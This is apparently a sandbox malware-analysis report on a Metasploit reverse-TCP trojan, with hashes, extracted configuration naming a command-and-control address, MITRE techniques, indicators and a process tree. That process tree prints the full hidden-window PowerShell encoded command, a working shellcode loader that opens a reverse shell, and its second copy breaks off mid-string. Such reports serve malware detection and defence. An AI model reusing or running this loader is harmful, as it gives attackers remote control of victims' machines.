metasploit | 690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6

General

Target

690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.exe
Size

17KB
MD5

b236486f7756776b56c743c03f7a106e
SHA1

964bc106798c2cfb951a19f8e59e1fcb5510ac23
SHA256

690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6
SHA512

42f3181244cb3d03cc5f08ede2dea275fadf2f3072f41c06eb8b3ffde3c33ad8fbbd8fb5a47f342b05664b6b553f3d330eb3610e61ff039cb0c1b0195572757d
SSDEEP

384:YfjcjwcOkjc5lPvL/c1fcrj8coFHPAel1rpI2cl1caXUCcYUlkX3nfT0f:ejcjwc1jc5B/c1fcrj8cccl1caXHc2X6

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.18.106:4535

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3592 powershell.exe

pid	process
3592	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3592 powershell.exe
3592 powershell.exe
2188 powershell.exe
2188 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3592 powershell.exe
Token: SeDebugPrivilege 2188 powershell.exe

pid	process
3592	powershell.exe
3592	powershell.exe
2188	powershell.exe
2188	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 3492 wrote to memory of 3924	3492	690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.exe	cmd.exe
PID 3492 wrote to memory of 3924	3492	690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.exe	cmd.exe
PID 3924 wrote to memory of 3592	3924	cmd.exe	powershell.exe
PID 3924 wrote to memory of 3592	3924	cmd.exe	powershell.exe
PID 3592 wrote to memory of 2188	3592	powershell.exe	powershell.exe
PID 3592 wrote to memory of 2188	3592	powershell.exe	powershell.exe
PID 3592 wrote to memory of 2188	3592	powershell.exe	powershell.exe
PID 2188 wrote to memory of 2720	2188	powershell.exe	csc.exe
PID 2188 wrote to memory of 2720	2188	powershell.exe	csc.exe
PID 2188 wrote to memory of 2720	2188	powershell.exe	csc.exe
PID 2720 wrote to memory of 2672	2720	csc.exe	cvtres.exe
PID 2720 wrote to memory of 2672	2720	csc.exe	cvtres.exe
PID 2720 wrote to memory of 2672	2720	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.exe
"C:\Users\Admin\AppData\Local\Temp\690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcA